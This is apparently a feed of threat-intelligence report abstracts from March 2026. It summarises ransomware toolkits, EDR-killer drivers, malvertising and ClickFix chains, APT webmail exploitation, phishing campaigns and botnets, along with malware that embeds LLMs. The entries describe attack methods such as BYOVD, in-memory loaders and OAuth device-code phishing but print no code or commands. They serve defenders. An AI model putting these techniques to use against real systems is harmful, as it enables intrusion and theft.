This analysis delves into the Beast ransomware, a Ransomware-as-a-Service (RaaS) that emerged in June 2024 as a successor to Monster ransomware. The investigation focuses on a Beast ransomware server detected in March 2026, revealing the operators' toolkit and attack methodology. The toolkit includes various tools for reconnaissance, network mapping, credential theft, persistence, lateral movement, exfiltration, and impact. Notable findings include the presence of both Windows and Linux versions of Beast ransomware, indicating targeting of workstations and Linux servers on VMware ESXi hypervisors. The report highlights the importance of proactive collection of internet telemetry in identifying ransomware operators' toolkits before they can be used against targets.
How a Tax Search Leads to Kernel-Mode AV/EDR Kill
released on 2026-03-19 @ 11:58:09 PM
A large-scale malvertising campaign targeting U.S. tax form searchers has been uncovered. The attack chain begins with Google Ads, using dual commercial cloaking services to evade detection. Victims are directed to rogue ScreenConnect installers, leading to a multi-stage crypter that ultimately deploys a BYOVD (Bring Your Own Vulnerable Driver) tool. This tool, named HwAudKiller, exploits a previously undocumented Huawei audio driver to terminate antivirus and EDR processes from kernel mode. The campaign's sophistication lies in its use of commodity tools and services, combining free-tier ScreenConnect instances, off-the-shelf crypters, and a signed driver with an exploitable weakness. The attackers consistently deploy multiple remote access tools on compromised hosts for redundancy, indicating a likely pre-ransomware or initial access broker operation.
When tax season becomes cyberattack season: Phishing and malware campaigns using tax-related lures
released on 2026-03-19 @ 03:28:28 PM
During tax season, threat actors exploit the urgency of time-sensitive tax-related emails to trick targets into opening malicious attachments, scanning QR codes, or following link chains. Recent campaigns identified by Microsoft Threat Intelligence use lures around W-2 forms, tax forms, and impersonation of government tax agencies and financial institutions. These campaigns aim to harvest credentials or deliver malware, often using phishing-as-a-service platforms for convincing credential theft and MFA bypass. Notable tactics include using legitimate remote monitoring tools, targeting specific industries and roles like accountants, and employing sophisticated social engineering techniques. The campaigns leverage various file formats, legitimate infrastructure, and multiple user interactions to complicate detection.
EDR killers explained: Beyond the drivers
released on 2026-03-19 @ 03:28:28 PM
This analysis explores the ecosystem of EDR (Endpoint Detection and Response) killers, tools used by ransomware attackers to disrupt security solutions before deploying encryptors. The research, based on almost 90 EDR killers tracked in the wild, reveals that these tools are fundamental in modern ransomware operations. Affiliates, not operators, typically choose EDR killers, leading to greater tooling diversity in larger affiliate pools. The same vulnerable driver can appear in unrelated tools, and tools can switch between drivers, making driver-based attribution unreliable. The landscape includes forked proofs of concept, professional implementations, and commercial offerings. While the Bring Your Own Vulnerable Driver (BYOVD) technique dominates, custom scripts, anti-rootkits, and driverless approaches are also utilized. The analysis emphasizes the importance of looking beyond drivers to understand the full scope of the EDR killer ecosystem and its implications for cybersecurity.
Analyzing the Current State of AI Use in Malware
released on 2026-03-19 @ 03:13:44 PM
Unit 42 researchers investigated the use of large language models (LLMs) in malware creation and functionality. They examined two samples: a .NET infostealer incorporating OpenAI's GPT-3.5-Turbo model via API, and a Golang-based malware dropper leveraging an LLM for environment assessment. The infostealer's LLM integration was poorly implemented and non-functional, serving as 'AI theater'. The dropper used an LLM to evaluate system safety before deploying its payload. While these samples show experimentation with AI in malware, they highlight challenges in effective implementation. The researchers anticipate future advancements in AI-assisted malware creation and execution, emphasizing the need for evolved defenses against AI-driven threats.
Threat Spotlight: ShinyHunters Fast-Tracks SaaS Access with Subdomain Impersonation
released on 2026-03-19 @ 02:23:02 PM
The threat group ShinyHunters has adopted a new tactic of subdomain impersonation for initial access, moving away from newly registered lookalike domains. They are utilizing mobile-first lures and outsourcing spam services to scale their operations. The group is likely reusing previously stolen CRM and ERP data to drive social engineering attacks. Their approach involves phone-guided adversary-in-the-middle phishing to capture credentials and authenticated sessions. ShinyHunters is also scaling vishing operations through paid contractors and specialized harassment services. This evolution in tactics allows for rapid identity-to-SaaS compromise without deploying malware, making traditional domain-based monitoring less effective.
From Invitation to Infection: How SILENTCONNECT Delivers ScreenConnect
released on 2026-03-19 @ 11:00:50 AM
A newly discovered loader called SILENTCONNECT is being used in active campaigns to silently install ScreenConnect, a remote monitoring and management tool, on victim machines. The infection chain begins with users being redirected to a Cloudflare Turnstile CAPTCHA page disguised as a digital invitation. Upon clicking, a VBScript file is downloaded, which retrieves and executes C# source code in memory using PowerShell. SILENTCONNECT employs various evasion techniques, including PEB masquerading and UAC bypass. The campaigns leverage trusted hosting providers like Google Drive and Cloudflare, and abuse living-off-the-land binaries. The loader has been active since March 2025 and poses a significant threat due to its stealthy nature and effectiveness.
New Malware Targets Users of Cobra DocGuard Software
released on 2026-03-19 @ 11:00:49 AM
A novel and stealthy threat called Infostealer.Speagle has been discovered, hijacking the functionality of Cobra DocGuard, a legitimate security software. This malware collects sensitive information from infected computers and transmits it to a compromised Cobra DocGuard server, masking the data exfiltration as legitimate communications. Speagle specifically targets computers with Cobra DocGuard installed and has shown capabilities to search for documents related to Chinese ballistic missiles. The infection vector remains unknown, but there are indications of a possible supply chain attack. The malware collects system information, file listings, and browser data in multiple phases, using sophisticated techniques to evade detection and self-delete after completing its tasks.
DTO malware that takes notes
released on 2026-03-19 @ 11:00:49 AM
Perseus is a new Android threat that builds upon earlier malware families like Cerberus and Phoenix. It enables real-time monitoring and interaction with infected devices through Accessibility-based remote sessions, allowing full Device Takeover. The malware focuses on extracting high-value personal information, including monitoring user notes. It employs strong anti-analysis measures to evade detection. Perseus is primarily distributed through IPTV applications, targeting users in Turkey and Italy. Its capabilities include overlay attacks, keylogging, and systematic exploration of note-taking apps. The malware performs extensive environment checks to detect analysis conditions and assess device risk. Perseus represents the ongoing evolution of mobile malware, adapting to remain effective in an increasingly secure mobile environment.
Inside a network of 20,000+ fake shops
released on 2026-03-18 @ 04:24:46 PM
A massive network of over 20,000 fraudulent e-commerce domains has been uncovered, all sharing common infrastructure and design patterns. These fake shops, primarily using the .shop domain, are designed to steal payment details and personal data from unsuspecting consumers. The operation is highly industrialized, with domains resolving to just 36 IP addresses, indicating a franchise-style model where a core team manages servers and templates while individual operators launch storefronts. The shops use familiar e-commerce tactics and psychological pressure to lure victims. To protect yourself, use browser protection tools, scrutinize unfamiliar domains, be wary of deep discounts, and look for independent reviews before making purchases.
The Proliferation of DarkSword: iOS Exploit Chain Adopted by Multiple Threat Actors
released on 2026-03-18 @ 03:44:34 PM
Google Threat Intelligence Group has identified a new iOS full-chain exploit called DarkSword, which leverages multiple zero-day vulnerabilities to compromise devices running iOS 18.4 through 18.7. Since November 2025, multiple commercial surveillance vendors and suspected state-sponsored actors have been observed using DarkSword in campaigns targeting users in Saudi Arabia, Turkey, Malaysia, and Ukraine. The exploit chain utilizes six different vulnerabilities to deploy final-stage payloads, including three distinct malware families: GHOSTBLADE, GHOSTKNIFE, and GHOSTSABER. The proliferation of DarkSword across various threat actors mirrors the previously discovered Coruna iOS exploit kit. Notable users include UNC6353, a suspected Russian espionage group, which has incorporated DarkSword into their watering hole campaigns targeting Ukrainian websites.
Technical Analysis of SnappyClient
released on 2026-03-18 @ 03:30:24 PM
Zscaler ThreatLabz identified a new command-and-control framework implant called SnappyClient, delivered via HijackLoader. SnappyClient is a C++-based implant with data theft and remote access capabilities. It employs evasion techniques like AMSI bypass, Heaven's Gate, direct system calls, and transacted hollowing. The malware receives configuration files from its C2 server and uses a custom encrypted network protocol. SnappyClient's main functions include stealing browser data, taking screenshots, keylogging, and providing remote shell access. Analysis suggests potential ties to HijackLoader based on code similarities. The primary goal appears to be cryptocurrency theft, targeting wallet addresses and crypto-related applications.
How to uncover a Horabot campaign and detect this malware
released on 2026-03-18 @ 11:15:06 AM
This report details the discovery and analysis of a Horabot malware campaign targeting primarily Mexican users. The attack chain begins with a fake CAPTCHA page leading to multiple stages of obfuscated scripts, ultimately delivering an AutoIT loader and a Delphi-based banking Trojan. The malware employs sophisticated encryption techniques, anti-VM checks, and a custom protocol for C2 communication. It also includes a spreader component written in PowerShell that harvests and exfiltrates email addresses to distribute phishing emails. The analysis reveals Brazilian Portuguese comments in the code, suggesting the threat actor's origin. The report provides detection opportunities including YARA rules and hunting queries to identify this threat.
Casting a Wider Net: Scaling Threat
released on 2026-03-18 @ 10:53:13 AM
LeakNet, a ransomware operator, has expanded its initial access methods by utilizing ClickFix lures on compromised websites and implementing a new Deno-based, in-memory loader. The group has shifted from relying on initial access brokers to running its own campaigns. LeakNet's post-exploitation playbook remains consistent, involving jli.dll side-loading, PsExec-based lateral movement, and S3 bucket payload staging. The Deno loader executes base64-encoded payloads in memory, making detection challenging for traditional security tools. Defenders are advised to focus on behavioral signals and implement measures such as blocking newly registered domains, restricting Win-R access, and limiting PsExec usage to authorized administrators.
Operation Roundish: Uncovering an APT28 Roundcube Exploitation Toolkit Targeting Ukraine
released on 2026-03-18 @ 10:51:38 AM
An exposed open directory revealed a comprehensive Roundcube exploitation toolkit used by APT28 to target Ukrainian government entities. The toolkit includes XSS payloads, a Flask-based C2 server, CSS injection tools, and a Go-based implant. It enables credential harvesting, persistent mail forwarding, bulk email exfiltration, address book theft, and 2FA secret extraction. The primary target was identified as mail.dmsu.gov.ua, Ukraine's State Migration Service. Technical analysis shows significant overlaps with previously documented APT28 operations, while introducing new capabilities such as CSS-based side-channel attacks and browser credential theft. The toolkit's modular approach and sophisticated evasion techniques demonstrate APT28's evolving tactics in compromising webmail platforms for long-term intelligence gathering.
Contagious Trader campaign - Coordinated weaponisation of cryptocurrency trading bots by suspected DPRK malware operators
released on 2026-03-18 @ 10:49:57 AM
The Contagious Trader campaign is a sophisticated malware operation targeting cryptocurrency users, attributed to North Korea with high confidence. It involves malicious cryptocurrency trading bot projects on GitHub that exfiltrate sensitive data and private keys using various techniques, including malicious npm dependencies. The campaign demonstrates overlaps with known North Korean tactics, particularly those of FAMOUS CHOLLIMA, including the use of GitHub, npm, and Vercel infrastructure, Base64-encoded payload URLs, and anonymizing VPNs for npm package publishing. The operation represents a shift in tactics, expanding beyond the previous Contagious Interview campaign to target a broader range of cryptocurrency users.
Analysis of the Spear-Phishing and KakaoTalk-Linked Threat Campaign
released on 2026-03-18 @ 10:49:04 AM
The Konni Group conducted a sophisticated multi-stage attack campaign, initiating with a spear-phishing email disguised as a North Korean human rights lecturer appointment. The attack progressed through execution of a malicious LNK file, installation of remote access malware, and long-term persistence for data theft. A key feature was the unauthorized access to victims' KakaoTalk PC applications, used to distribute additional malicious files to selected contacts. The campaign employed multiple RAT families, including EndRAT, RftRAT, and RemcosRAT, with a distributed C2 infrastructure across Finland, Japan, and the Netherlands. The threat actor's tactics included trust-based propagation, account session abuse, and modular payload deployment, highlighting the need for advanced behavior-based detection and multi-layered defense strategies.
Minecraft: Dark Tale of Scams, Malware & Extortion
released on 2026-03-18 @ 10:42:02 AM
The article exposes a sophisticated scam targeting Minecraft players through fake 'grief-free' server communities. The SugarSMP website, promising a safe gaming experience, was found to distribute malware-infected mod packs. The malware, named Spark stealer, steals sensitive data including Discord tokens, browser credentials, and crypto wallet information. The threat actors employ social engineering tactics to maintain their fake community's reputation and remove warnings about their activities. Multiple similar websites were discovered, all hosting various types of malware. The scam's persistence mechanisms and social engineering techniques are detailed, along with remediation steps for affected users.
Fake Pudgy World site steals crypto passwords
released on 2026-03-18 @ 10:37:07 AM
A sophisticated phishing campaign is targeting users of the newly-launched Pudgy World browser game, exploiting the game's requirement to connect cryptocurrency wallets. The fake site mimics the official game's appearance and wallet connection process, presenting convincing forgeries of 11 different wallet interfaces to steal credentials. The attack employs advanced evasion techniques to avoid detection by security researchers and sandboxes. It capitalizes on the excitement around the game's launch and users' unfamiliarity with Web3 onboarding processes. The campaign demonstrates a high level of technical sophistication, potentially indicating the use of a commercial phishing kit designed for crypto-related attacks.
Operation GhostMail: Russian APT Exploits Zimbra XSS to Target Ukraine Government
released on 2026-03-17 @ 03:40:09 PM
A sophisticated phishing campaign targeting a Ukrainian government agency exploits a cross-site scripting vulnerability in Zimbra Collaboration Suite. The attack, attributed to a Russian APT group, uses a seemingly innocuous internship inquiry email to deliver a malicious JavaScript payload. When opened in a vulnerable Zimbra webmail session, the script silently executes, harvesting credentials, session tokens, 2FA codes, and mailbox contents. The multi-stage attack employs obfuscation techniques, SOAP API abuse, and dual-channel exfiltration via DNS and HTTPS. The campaign demonstrates the evolution of webmail-focused intrusions, relying on browser-resident stealers rather than traditional malware binaries.
Iranian Botnet Exposed via Open Directory: 15-Node Relay Network and Active C2
released on 2026-03-17 @ 03:07:58 PM
An Iranian threat actor's operational infrastructure was exposed through an open directory, revealing a 15-node relay network spanning Finland and Iran, an SSH-based botnet framework, and an active command and control server. The exposed bash history documented the full operation, including tunnel deployment, DDoS tooling development, and botnet creation. The actor used on-host compilation to evade detection and leveraged a Python script for mass SSH deployment. The botnet client, compiled and renamed 'hex' on infected hosts, showed automatic reconnection capabilities. This operation appears to be financially or personally motivated rather than state-directed, with infrastructure dual-purposed for censorship bypass and attack operations.
Hydra Saiga: Covert Espionage and Infiltration of Critical Utilities
released on 2026-03-17 @ 11:03:35 AM
Hydra Saiga, a suspected Kazakhstani state-sponsored threat actor, has been actively targeting government, energy, and critical infrastructure in Central Asia, Europe, and the Middle East since 2021. The group is known for using Telegram Bot API for C2 communication and employing a mix of custom implants and 'Living off the Land' techniques. Their activities align closely with Kazakhstan's geopolitical interests, particularly in water and energy sectors. The group has compromised at least 34 organizations across 8 countries, with reconnaissance extending to over 200 additional targets globally. Hydra Saiga's operations demonstrate a clear focus on water infrastructure linked to major regional rivers and gas distribution systems, reflecting strategic intelligence collection efforts.
New backdoor targeting Ukrainian entities with possible links to Laundry Bear
released on 2026-03-17 @ 11:01:39 AM
A new campaign targeting Ukrainian entities has been identified, attributed to actors linked to Russia. The campaign uses judicial and charity-themed lures to deploy a JavaScript-based backdoor called DRILLAPP, which runs through the Edge browser. This backdoor enables various actions including file manipulation, microphone access, and webcam capture. Two variants of the campaign have been observed, with the second variant introducing additional capabilities. The attackers utilize the browser's capabilities to evade detection and gain access to sensitive resources. The campaign shares tactics with a previously reported Laundry Bear operation, leading to a low-confidence attribution to this group.
A Slopoly start to AI-enhanced ransomware attacks
released on 2026-03-17 @ 10:59:32 AM
IBM X-Force discovered a likely AI-generated malware named 'Slopoly' used in a ransomware attack by the Hive0163 group. This marks the beginning of AI adoption among cybercrime groups, potentially transforming the threat landscape. Slopoly, while relatively unsophisticated, demonstrates how easily threat actors can use AI to develop new malware quickly. The attack involved ClickFix social engineering, NodeSnake malware, and InterlockRAT, culminating in the deployment of Interlock ransomware. This incident highlights the growing trend of AI-generated and AI-integrated malware, which could lead to more ephemeral and difficult-to-attribute attacks, challenging traditional threat intelligence methods.
Endgame Harvesting: Inside ACRStealer's Modern Infrastructure
released on 2026-03-17 @ 10:55:52 AM
ACRStealer, a sophisticated Malware as a Service, has evolved with enhanced evasion techniques and C2 communication strategies. It employs low-level syscalls and AFD for stealthy operations, bypassing user-mode hooks. The malware uses layered communication, establishing raw TCP connections followed by SSL/TLS over SSPI. ACRStealer's data-stealing capabilities are extensive, targeting browsers, Steam accounts, and performing victim fingerprinting. It can execute secondary payloads and capture screenshots. The malware shows an active infection pattern in countries like the USA, Mongolia, and Germany, communicating with specific IP addresses and domains. Recent developments indicate a shift to LummaStealer, suggesting ongoing threat actor activities targeting gaming platforms and social media.
Boggy Serpens Threat Assessment
released on 2026-03-17 @ 09:13:38 AM
The Iranian threat group Boggy Serpens, linked to the Ministry of Intelligence and Security, has refined its cyberespionage tactics to focus on trusted relationship compromises and multi-wave targeting of strategic organizations. The group combines social engineering with AI-enhanced malware for long-term persistence, primarily targeting diplomatic and critical infrastructure sectors. Recent campaigns show increased technological capabilities, including AI-generated code and Rust-based tools. Boggy Serpens exploits hijacked accounts to bypass security measures and employs a secondary social engineering prompt to deliver malware. The group's determination is exemplified by a sustained four-wave campaign against a UAE marine and energy company, demonstrating its focus on infiltrating regional maritime infrastructure.
Hacked sites deliver Vidar infostealer to Windows users
released on 2026-03-17 @ 09:09:18 AM
A recent cybercrime campaign uses compromised WordPress websites to distribute the Vidar infostealer malware to Windows users. The attack employs fake CAPTCHA pages that trick victims into running malicious commands. The infection chain involves an HTA script, which downloads and executes a malicious MSI installer. This installer then deploys a GoLang loader that ultimately decrypts and loads the Vidar infostealer into memory. The campaign targets users in multiple countries, including Italy, France, the United States, the United Kingdom, and Brazil. The attackers inject malicious code into WordPress sites, which filters visitors and displays the fake CAPTCHA page to Windows desktop users.
IoCs (Indicators of Compromise) for the Coruna iOS iPhone Web Malware Client Side Exploits Serving Web Malware Exploitation Kit
released on 2026-03-16 @ 11:26:57 PM
The intelligence details indicators of compromise for the Coruna iOS iPhone web malware exploitation kit. It provides MD5, SHA-1, and SHA-256 hashes for detected JavaScript payloads. The analysis lists numerous active domains serving the malware, including specific URLs delivering client-side exploits. The campaign involves a wide network of malicious domains and URLs targeting iOS devices. The extensive list of compromised and malicious infrastructure demonstrates the scale of this exploitation kit's operations, highlighting the ongoing threat to iPhone users through web-based attacks.
COVERT RAT: Phishing Campaign
released on 2026-03-16 @ 03:29:07 PM
A sophisticated multi-stage infection chain targets Argentina's judicial ecosystem using spear-phishing tactics and authentic-looking judicial content. The campaign employs a carefully crafted ZIP archive containing a weaponized LNK shortcut, BAT-based loader script, and judicial-themed PDF decoy. The attack chain leads to the deployment of a Rust-based Remote Access Trojan (RAT) that demonstrates extensive anti-VM, anti-sandbox, and anti-debugging techniques. The RAT establishes a resilient command-and-control channel, supports modular commands for various malicious activities, and implements full lifecycle management. The operation, dubbed 'Operation Covert Access,' aims to secure long-term access within high-trust institutional settings, highlighting the need for improved defenses against socially engineered intrusion chains.
GoPix banking Trojan targeting Brazilian financial institutions
released on 2026-03-16 @ 03:14:29 PM
GoPix is an advanced persistent threat targeting Brazilian financial institutions and cryptocurrency users. It uses memory-only implants and obfuscated PowerShell scripts, evolving from previous RAT and ATS threats. The malware employs sophisticated techniques, including malvertising via Google Ads, man-in-the-middle attacks, and monitoring of Pix transactions and Boleto slips. GoPix bypasses security measures, maintains persistence, and uses robust cleanup mechanisms. It leverages multiple obfuscation layers and a stolen code signing certificate to evade detection. The threat actors carefully select victims, including financial bodies of state governments and large corporations, using legitimate anti-fraud services for targeted delivery.
Web Shells, Tunnels, and Ransomware: Dissecting a Warlock Attack
released on 2026-03-16 @ 11:01:03 AM
The Warlock ransomware group has enhanced its attack chain with improved methods for persistence, lateral movement, and evasion. Their updated toolset includes TightVNC, Yuze, and a persistent BYOVD technique exploiting the NSec driver. The group's primary targets were technology, manufacturing, and government sectors, with the US, Germany, and Russia being the most affected countries. Warlock continues to exploit unpatched Microsoft SharePoint servers for initial access, and has expanded its post-exploitation toolkit. New additions include TightVNC for persistent remote access, Yuze for establishing SOCKS5 connections, and a BYOVD technique using the NSecKrnl.sys driver to terminate security products. The group also leverages Velociraptor, VS Code tunnels, and Cloudflare Tunnel for C&C communications.
MAAS VIP_Keylogger Campaign
released on 2026-03-16 @ 10:51:29 AM
A sophisticated keylogger campaign has been discovered, utilizing spear-phishing emails with attachments containing hidden malware. The campaign targets multiple countries, employing various packaging styles and execution methods. The malware, known as VIP_Keylogger, is delivered using steganography and process hollowing techniques. It focuses on stealing sensitive information from browsers, email clients, and other applications. The keylogger captures browser data, decrypts passwords, and exfiltrates information through multiple channels, including email. While some features appear disabled, the malware demonstrates advanced capabilities in data theft and evasion techniques.
Investigating a new Click-fix variant
released on 2026-03-16 @ 10:28:14 AM
A new variant of the ClickFix technique has been identified, where attackers convince users to execute malicious commands on their devices through the Win + R shortcut. This variation uses a 'net use' command to map a network drive from an external server, followed by executing a '.cmd' batch file. The script downloads a ZIP archive, unpacks it, and executes a legitimate WorkFlowy application with modified, malicious logic hidden inside an '.asar' archive. This acts as a C2 beacon and a dropper for the final malware payload. The attack bypasses typical detection methods and utilizes Electron application bundling to hide malicious code.
Operation CamelClone: Multi-Region Espionage Campaign Targets Government and Defense Entities Amidst Regional Tensions
released on 2026-03-16 @ 10:27:42 AM
Operation CamelClone is a multi-region espionage campaign targeting government and defense entities in Algeria, Mongolia, Ukraine, and Kuwait. The attackers use spear-phishing emails with malicious ZIP archives containing lure documents and shortcuts. The infection chain involves a JavaScript loader called HOPPINGANT, which downloads additional payloads from public file-sharing websites. The campaign abuses legitimate tools like Rclone for data exfiltration to MEGA cloud storage. Targeting patterns suggest intelligence gathering objectives, focusing on foreign policy, defense capabilities, and diplomatic alignments of countries navigating major-power rivalries. The operation's use of public services for payload hosting and data exfiltration makes network-based detection challenging.
China-nexus Threat Actor Targets Persian Gulf Region With PlugX
released on 2026-03-16 @ 10:26:21 AM
A China-nexus threat actor targeted countries in the Persian Gulf region using a multi-stage attack chain to deploy a PlugX backdoor variant. The campaign exploited the renewed Middle East conflict, using an Arabic-language document lure depicting missile attacks. The attack utilized a ZIP archive containing a malicious Windows shortcut file, which downloaded a CHM file leading to the deployment of PlugX. The malware employed various obfuscation techniques, including control flow flattening and mixed boolean arithmetic. The PlugX variant supported HTTPS for command-and-control communication and DNS-over-HTTPS for domain resolution. Based on the tools and tactics used, the activity is attributed to a China-nexus actor, possibly linked to Mustang Panda.
Storm-2561 uses SEO poisoning to distribute fake VPN clients for credential theft
released on 2026-03-16 @ 10:25:35 AM
A credential theft campaign by Storm-2561 exploits SEO poisoning to distribute fake VPN clients. Users searching for legitimate VPN software are redirected to malicious websites hosting ZIP files containing trojans masquerading as trusted VPN clients. These digitally signed trojans harvest VPN credentials and exfiltrate data to attacker-controlled infrastructure. The campaign uses GitHub repositories, legitimate code-signing certificates, and sophisticated post-theft redirection strategies to avoid detection. The attack chain involves initial access through SEO manipulation, execution of malicious MSI files, credential theft via fake VPN interfaces, and data exfiltration. Defensive recommendations include enabling cloud-delivered protection, using EDR in block mode, and enforcing multi-factor authentication.
Suspected China-Based Espionage Operation Against Military Targets in Southeast Asia
released on 2026-03-16 @ 10:24:59 AM
A suspected Chinese state-sponsored espionage campaign targeting Southeast Asian military organizations has been identified, traced back to at least 2020. Designated as CL-STA-1087, the operation demonstrates strategic patience and focused intelligence collection on military capabilities and structures. The attackers deployed custom tools including the AppleChris and MemFun backdoors, and a modified Mimikatz variant called Getpass. The campaign is characterized by the use of dead drop resolvers, custom HTTP verbs, and anti-forensic techniques. Infrastructure analysis reveals long-term persistence and operational compartmentalization. The activity aligns with Chinese working hours and utilizes China-based cloud infrastructure, suggesting a Chinese nexus.
"Handala Hack" - Unveiling Group's Modus Operandi
released on 2026-03-16 @ 10:24:13 AM
Handala Hack, an online persona operated by Void Manticore, is affiliated with Iranian intelligence services. The group, known for destructive wiping attacks and hack-and-leak operations, has targeted organizations in Israel, Albania, and the US. Their tactics include supply chain attacks, credential theft, and manual intrusions. The group deploys multiple wiping methods simultaneously, including custom malware, PowerShell scripts, and disk encryption. Recent activities show expanded targeting and some new techniques, such as using NetBird for tunneling and AI-assisted wiping scripts. Despite some operational security lapses, Handala continues to pose a significant threat, primarily through hands-on, opportunistic attacks.
Phishers hide scam links with IPv6 trick in 'free toothbrush' emails
released on 2026-03-16 @ 10:23:42 AM
A recurring phishing scheme impersonates United Healthcare, offering a free Oral-B toothbrush as bait. The scammers have evolved their tactics, now using IPv4-mapped IPv6 addresses to obfuscate links in emails. This technique makes the IP addresses appear confusing while remaining valid and routable. The phishing emails direct victims to fast-rotating landing pages, likely aiming to collect personal information and card data under the guise of confirming eligibility or paying for shipping. The article provides technical details on how the IPv6 trick works and offers advice on staying safe, including steps to take if personal information has been compromised.
Wide-scale, opportunistic SMS pumping attacks target customer sign-up pages
released on 2026-03-13 @ 06:24:59 PM
A widespread SMS pumping campaign has been identified, targeting customer sign-up pages. The attackers, designated as O-UNC-036, use disposable email infrastructure and proxy services to launch high-volume, automated attacks against public API endpoints. Their objective is to create numerous accounts and trigger SMS messages to actor-controlled phone numbers, generating significant financial costs for target organizations. The attack pattern involves reconnaissance, infrastructure setup, and high-volume requests using known high-cost phone country codes. The campaign has been active since at least March 2024, affecting multiple tenants and organizations. Recommended protective measures include implementing FIDO Authentication, blocking suspicious domains and ASNs, and enhancing monitoring and response capabilities.
Data Exfiltration and Threat Actor Infrastructure Exposed
released on 2026-03-13 @ 11:17:26 AM
Huntress SOC analysts have uncovered sophisticated data exfiltration techniques employed by threat actors. The analysis reveals the use of various tools for data staging, including WinZip, 7Zip, and Windows' native tar.exe. Exfiltration methods observed include the use of finger.exe and backup utilities like restic, BackBlaze, and s5cmd. A specific incident on February 25, 2026, involved INC ransomware deployment, with the threat actor using PsExec for privilege escalation and creating a scheduled task to run a malicious PowerShell script. The actor utilized the Restic backup utility, renamed as winupdate.exe, to exfiltrate data. Similar tactics were observed in a previous incident on February 9, suggesting a pattern in the threat actor's methodology.
RondoDox Botnet: From Zero to 174 Exploited Vulnerabilities
released on 2026-03-11 @ 03:49:33 PM
The RondoDox botnet has emerged as a significant threat, exploiting 174 different vulnerabilities since May 2025. It primarily targets IoT devices and internet-exposed services for DoS attacks. The botnet's infrastructure includes exploiting and hosting components, with evidence suggesting the use of compromised residential IPs. RondoDox's operators have shown a rapid adoption of newly disclosed vulnerabilities, sometimes exploiting them within days of publication. The botnet's evolution includes a shift from a shotgun approach using numerous exploits to a more focused strategy targeting recent, critical vulnerabilities. The malware shares similarities with Mirai but focuses solely on DoS attacks. This threat highlights the importance of exposure management in cybersecurity.
Iran conflict drives heightened espionage activity against Middle East targets
released on 2026-03-11 @ 03:24:25 PM
The ongoing conflict involving Iran has led to increased cyber espionage activities targeting Middle Eastern governments. Multiple state-sponsored threat actors, including those from China, Belarus, Pakistan, and Hamas, have been observed conducting campaigns using the conflict as a lure. These actors are employing various tactics such as credential phishing, malware delivery, and compromised accounts to target government and diplomatic organizations. The campaigns often use war-themed content to engage targets and gather intelligence on the conflict's trajectory and geopolitical implications. Iranian threat actors continue their traditional espionage efforts alongside disruptive campaigns in support of war efforts. This heightened activity reflects both opportunistic use of topical lures and shifts in intelligence collection priorities for various state-aligned groups.
Middle East Crisis Exploited by Fraudsters: Government Impersonation and Evacuation Scam Infrastructure Identified
released on 2026-03-11 @ 11:10:32 AM
The ongoing Middle East crisis has given rise to opportunistic online fraudulent activities. Two main strands have been observed: confirmed government-impersonation fraud and suspicious evacuation-themed websites. Fraudsters are exploiting the confusion and urgency surrounding the crisis to launch phishing campaigns and create deceptive websites. A notable example includes an email impersonating UAE authorities, urging recipients to complete a mandatory emergency registration form. Additionally, several newly registered websites offering evacuation services from Dubai and the Gulf region have emerged, displaying characteristics commonly associated with scams. These sites use crisis-related domain names, employ urgent messaging, lack verifiable operator details, and often request unconventional payment methods. The situation highlights the need for increased vigilance and proactive monitoring of emerging digital threats during geopolitical crises.
CastleRAT attack first to abuse Deno JavaScript runtime to evade enterprise security
released on 2026-03-11 @ 11:10:31 AM
A sophisticated infection chain has been discovered that installs CastleRAT malware without leaving traces on disk. The attack uniquely abuses the Deno runtime as a malicious framework, combining social engineering, steganography, and in-memory execution to evade detection. The process involves tricking users into executing a command, installing Deno, running obfuscated JavaScript, and decoding a payload hidden in a JPEG image. CastleRAT then gains total control, performing host fingerprinting, keylogging, clipboard hijacking, digital identity theft, and audio/video surveillance. This campaign demonstrates the evolution of malware towards invisibility and the need for advanced endpoint behavioral monitoring to detect such threats.
Stolen Service Accounts Lead to Rogue Workstations and Deep AD Compromise
released on 2026-03-11 @ 11:10:30 AM
SentinelOne's DFIR team has responded to multiple incidents involving compromised FortiGate NGFW appliances used to establish footholds in targeted environments. Attackers exploited vulnerabilities or weak credentials to access FortiGate devices, extract configuration files containing service account credentials, and use those to join rogue workstations to Active Directory. In one case, the attacker used the access to deploy remote management tools and steal the NTDS.dit file. The incidents highlight the need for strong access controls, patching, and improved logging on edge devices. Organizations are advised to implement SIEM solutions to detect anomalous activity and automate responses.
KadNap Malware Turning Asus Routers Into Botnets
released on 2026-03-11 @ 10:02:08 AM
A sophisticated new malware called KadNap has been discovered targeting Asus routers and conscripting them into a botnet for proxying malicious traffic. The malware employs a custom version of the Kademlia Distributed Hash Table protocol to conceal its command-and-control infrastructure within a peer-to-peer system, evading traditional network monitoring. The botnet, which has grown to over 14,000 infected devices, is marketed by a proxy service called Doppelganger, tailored for criminal activity. More than 60% of KadNap's victims are based in the United States. The malware demonstrates versatility by targeting various edge networking devices and employing different C2 servers for different victim types.
Microsoft OAuth Device Code Phishing
released on 2026-03-11 @ 06:17:04 AM
A new phishing technique abusing Microsoft's OAuth Device Code flow is on the rise, with over 180 phishing URLs detected in a week. This method shifts from credential theft to token-based account takeover, making detection more challenging. Attackers initiate a device authorization process, tricking victims into approving it on legitimate Microsoft pages. The attack uses encrypted HTTPS traffic and legitimate authentication flows, bypassing traditional phishing indicators. Victims unknowingly grant attackers access to their Microsoft 365 accounts through OAuth tokens. This poses a critical risk as it allows immediate access to corporate data and resources, potentially leading to business email compromise and persistent access through refresh tokens.
Iranian MOIS Actors & the Cyber Crime Connection
released on 2026-03-10 @ 09:10:44 PM
Iranian intelligence services are increasingly engaging with the cyber crime ecosystem, leveraging criminal tools, services, and operational models to support state objectives. This trend is particularly evident among actors linked to the Ministry of Intelligence and Security (MOIS), such as Void Manticore and MuddyWater. These actors are not merely imitating criminal behavior but actively associating with the cyber criminal ecosystem, using its infrastructure, malware, and affiliate-style relationships. This approach enhances their operational capabilities, complicates attribution, and contributes to confusion around Iranian threat activity. Examples include the use of ransomware branding, commercial infostealers, and overlaps with criminal malware clusters. This shift from imitation to active engagement with cyber crime offers both improved deniability and expanded technical capabilities for Iranian actors.
Quiz sites trick users into enabling unwanted browser notifications
released on 2026-03-10 @ 12:56:29 PM
